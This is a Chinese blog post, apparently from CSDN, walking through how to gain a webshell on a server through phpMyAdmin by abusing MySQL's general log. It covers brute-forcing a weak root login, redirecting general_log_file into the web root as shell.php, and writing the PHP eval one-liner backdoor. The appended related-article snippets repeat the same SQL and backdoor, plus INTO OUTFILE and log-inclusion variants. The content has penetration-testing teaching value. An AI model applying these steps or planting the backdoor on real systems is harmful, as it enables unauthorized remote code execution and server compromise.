shell 写入文件_phpMyAdmin利用日志文件GetSHELL

最新推荐文章于 2024-01-23 14:14:00 发布
最新推荐文章于 2024-01-23 14:14:00 发布
阅读量474 收藏 1
点赞数
文章标签: shell 写入文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35583709/article/details/113317419
版权
本文详细介绍了如何通过phpMyAdmin利用日志文件在满足特定前提条件下获取服务器Shell。首先介绍phpMyAdmin的基本信息,然后阐述GetSHELL的前提,包括账号权限和MySQL版本。接着,通过获取网站绝对路径和弱口令登录phpMyAdmin,开启日志读写功能。在创建shell.php文件并写入PHP一句话木马后,成功实现了GetSHELL。
摘要由CSDN通过智能技术生成

phpMyAdmin简介

phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。

GetSHELL前提

1、phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可写权限

2、MySQL版本大于5.0,MySQL 5.0版本以上会创建日志文件,我们通过修改日志文件的全局变量,就可以GetSHELL

3、满足上方两个条件,还需要知道网站的绝对路径,对于网站的绝对路径查找有很多方法,在我上一篇文章里有讲解到:传送门

GetSHELL过程

219d6ea7e251d1486ff9a7d3e38f9391.png

这边是通过php探针获取到了网站的绝对路径:C:/phpStudy/WWW

60cd686179600e679eb53b90b728289d.png

接着是通过弱口令爆破来得到了phpMyAdmin的登陆账号密码:root

2835844ccf25a9e6ba9cbb2b3f326eab.png

进入到phpMyAdmin管理页面后,得到一些关键信息:

  • 数据库服务器:
服务器: localhost via TCP/IP软件: MySQL软件版本: 5.5.40 - MySQL Community Server (GPL)协议版本: 10用户: root@localhost服务器字符集: UTF-8 Unicode (utf8)
  • 网站服务器
Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17数据库客户端版本: libmysql - 5.0.51aPHP 扩展: mysqli 文档

得知MySQL的版本是大于5.0,那么应该可以通过日志写入shell

查看日志的信息

0f9b9221aaeb0f7aa54cf78690d361ab.png 
show variables like '%general%';

日志读写默认是关闭的OFF,然后我们打开日志读写功能:

8f4c6ecd03404ac04255a4f0d03803ef.png 
打开general_log日志读写功能SET GLOBAL general_log='on'
ec50e5fc9be60c4a155ee19f6be92efd.png

创建文件

由于之前我们通过php探针得到了网站的绝对路径,然后我们就可以写入shell.php到网站的根目录下:

e5f6bea38be932aabacbc4c20e1da020.png 
SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'

这个时候,对应的路径下就会生成一个shell.php脚本文件:

40bf5b9fd747aad2a18f5726f77480ef.png

写入一句话到shell.php

PHP一句话木马:

1<?php @eval($_POST[liuwx]);?>

写入一句话语句:

1SELECT '<?php @eval($_POST[liuwx]);?>'
3dc967b39af0071c4150c0a7b22a8e27.png

这个时候就成功写入一句话到了shell.php里:

ac93e21bdb25968a44435ad7faba3565.png

成功GetSHELL:

6da539022734b7f1779a53bb2dbac3f7.png
物理老卢
关注
【网络安全】日志注入getshell
等风来
12-26 2378
中间件的日志文件通常用于保存网站的访问记录,其中包括了客户端发送的HTTP请求行、User-Agent、Referer等信息。这些日志文件对于网站的运维和安全分析非常有用。如果能够在HTTP请求中插入恶意代码,那么这些恶意代码就会被保存到日志文件中。当访问日志文件时,其中的恶意代码可能会被执行
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1871
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询入webshell4、创建数据库和表入webshell: 1、日志文件 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面入内容的话,那么就可以成功 getshell
phpmyadmin通过日志shell
m0_53087192的博客
01-07 930
1.查看general log是否开启 show variables like ‘%general%’; 打开general_log日志功能 SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’; 查看绝对路径(探针等) shell,会把执行的语句shell.php,然后我们查询一下 SET GLOBAL general_log_file=‘C://phpStudy//PHPTutorial//WWW//shel
文件包含之日志getshell
qq_42307546的博客
01-15 2115
iis,apache等中间件都会用一个日志文件用来记录一些信息,例如在某个时间段用户访问的url路劲和状态码,如果这个时候将访问的url改为一句话代码就会记录到日志中,在配合文件包含漏洞是可以直接getshell的,当然这个只在windows下有效 在linux日志路劲 /log/apache2/access.log,需要root用户才能读取正常情况不能包含这里为了方便演示直接加权限 创建一个f1.php的文件内容如下 <?php include $GET['filename']; ?> ``
phpMyadmin通过日志webshell
p_utao的博客
11-23 877
查看general log是否开启 show variables like '%general%'; 打开general_log日志功能 SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%'; 通过探针查看绝对路径 shell SET GLOBAL general_log_file='C://phpStudy//PHPTutorial//WWW//shell.php'; 会把执行的语句shell.php,然后我们
phpmyadmin+日志getshell
Zlirving_的博客
06-16 1764
通过phpmyadmin管理后台getshell思路有很多种,比如直接入一句话、创建表再导出、慢查询日志等… 这里较详细介绍一下普通日志getshell思路   phpMyAdmin phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。   GetSHELL前提 phpMyAdmin利用日志文件GetSHELL
getshellPhpmyadmin日志
MoCoCN的博客
08-30 663
@MoCoCN Phpmyadmin日志getshell 当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell的姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。 1.准备环境 一台装有Phpstudy(mysql>5.0)的服务器 中国蚁剑 2.开启phpstudy 3.访问服务器phpmyadmin页面 4.弱口令root root登录进去,点击SQL,执行sql语句 查
phpmyadmin中mysql返回_phpMyAdmin利用小结
weixin_28981373的博客
01-28 398
获取版本信息在phpmyadmin根目录下后面添加:READMEChangeLogdoc/html/index.htmlChangechangelog.phpreadme.phpDocumetation.htmlDocumetation.txttranslators.html在fofa上搜索相应站点进行测试:常规getshell手段:1、SQL注入:看看网站是否存在注入利用注入出来的账号密码登录2...
记一次tp5.0.24 getshell1
08-03
"记一次tp5.0.24 getshell" 在这篇文章中,我们将探讨一个关于TP5.0.24版本的getshell漏洞的记录。TP5.0.24是ThinkPHP框架的其中一个版本,该框架是一种流行的PHP开发框架。 首先,我们需要了解TP5.0.24的特点。TP...
【渗透测试】--- 利用phpmyadmin来getshell
qq_43168364的博客
12-24 656
利用phpmyadmin来getshell有两种方式 1、利用into outfile直接将一句话写入文件中 2、利用Mysql的日志文件getshell 不论是那种方式都要满足以下三个条件: 未限制文件路径 secure_file_priv= 当前用户有文件权限 知道网站根目录 — C:\phpStudy\PHPTutorial\WWW 第一种方法 select "<?php phpinfo();?>" into outfile "/var/www/html/tes
SQL语句利用日志shell
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-24 322
SQL语句利用日志shell outfile被禁止,或者写入文件被拦截 在数据库中操作如下:(必须是root权限) 1.show variables like ‘%general%'; #查看配置 2.set global general_log = on; #开启general log模式 3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为shell地址 4.select ‘<?php eval($_POST[cmd]);
日志getshell
weixin_54252904的博客
04-23 388
phpmyadmin日志getshell设置日志文件上传一句话木马查看是否成功蚁剑或菜刀getshellgetshell成功 在进入别人的phpmyadmin数据库后可以采用日志getshell 具体过程如下 设置日志文件 设置general_log = ON general_log_file = 网站根目录的php文件 上传一句话木马 执行sql语句 密码为cmd 查看是否成功 找到上传的地址 蚁剑或菜刀getshell getshell成功 最后可使用反弹shel
文件包含漏洞 执行之包含日志文件getshell
最新发布
2301_80361487的博客
01-23 385
知道日志的物理存放路径、存在文件包含漏洞、使用burp发送请求,或者curl工具(网页请求会对特殊字符编码)
sql怎么继续编辑已经保存的代码_某团购CMS的GETSHELL操作代码审计
weixin_39673051的博客
12-06 113
作者:会上树的猪合天智汇 0x00 点废话在渗透测试中,获取一个webshell应该是我们不屑的追求,今天要通过这个CMS从代码的角度看一下可利用的getshell的方法。这一次的代码审计需要借助工具来定位可能存在的漏洞点,选择Seay源代码审计系统。步入正题。0x01文件上传getshell:1、/kindupload.php:通过获取文件最后一个扩展名进行白名单匹配,且添加随...
文件包含漏洞结合ssh登录日志getshell
weixin_54813510的博客
06-26 706
文件包含(漏洞)是程序开发人员通常出于灵活性的考虑,会将被包含的文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞。文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞。php中文件包含的函数有:require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。include(),找不到被包含的文件时只会产生警告,脚本将继续运行。include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。
(三)phpstudy下开启mysql,运用phpmyadmin管理执行sql语句,入一句话后门getshell
爱上卿的博客
01-15 3717
学习mysql数据库漏洞整理过程中,想复现phpmyadmin入一句话后门getshell的过程遇到很多问题。phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多。phpmyadmin实现mysql数据库的管理,采用phpstudy实现较为方便。过程出现较多障碍,一步步走向成功,记录。 1 启动phpstudy,出现mysql无法启动的问题 因为之前已经装...
基于SQL注入漏洞读文件Getshell技巧
道阻且长,行则将至。
06-28 2139
文章目录前言手工注入靶场环境into outfileSQLMap靶场环境--os-shell文件总结 前言 在 HW 行动和攻防演练过程中,获得 Shell 的方式总结起来大概是以下几种(当然了如果能够通过源码泄露审计出 0day 的大佬的姿势另说……): 暴力破解+弱口令/未授权访问漏洞登录后台,任意文件上传漏洞 Getshell; Shiro、Struts2、Fastjson 等反序列化漏洞导致 RCE; 通过 SQL 注入漏洞入木马文件并 Getshell…… 在前面一篇文章:渗透测试-Ph
phpmyadmin之getshell总结
Adminxe的博客
05-03 509
0x00 前言 简单总结下phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细利用姿势的方法),建议getshell之前,查看用户权限以及phpmyadmin的版本,方便对于漏洞的利用。 0x01 getshell姿势 1、selectintooutfile直接入 2、开启全局日志getshell 3、使用慢查询日志getse...
php如何用菜刀连接getshell,phpmyadmin之getshell总结
weixin_34802266的博客
03-16 492
title: phpmyadmin中getshell的几种姿势1,利用全局变量general_log去getshellshow variables like ‘%general%’;然后将general_log打开,执行命令set global general_log=on;因为phpstudy默认的根目录是/phpstudy/www/,所以接下来只需要修改日志文件的位置到网站的根目录下。set ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值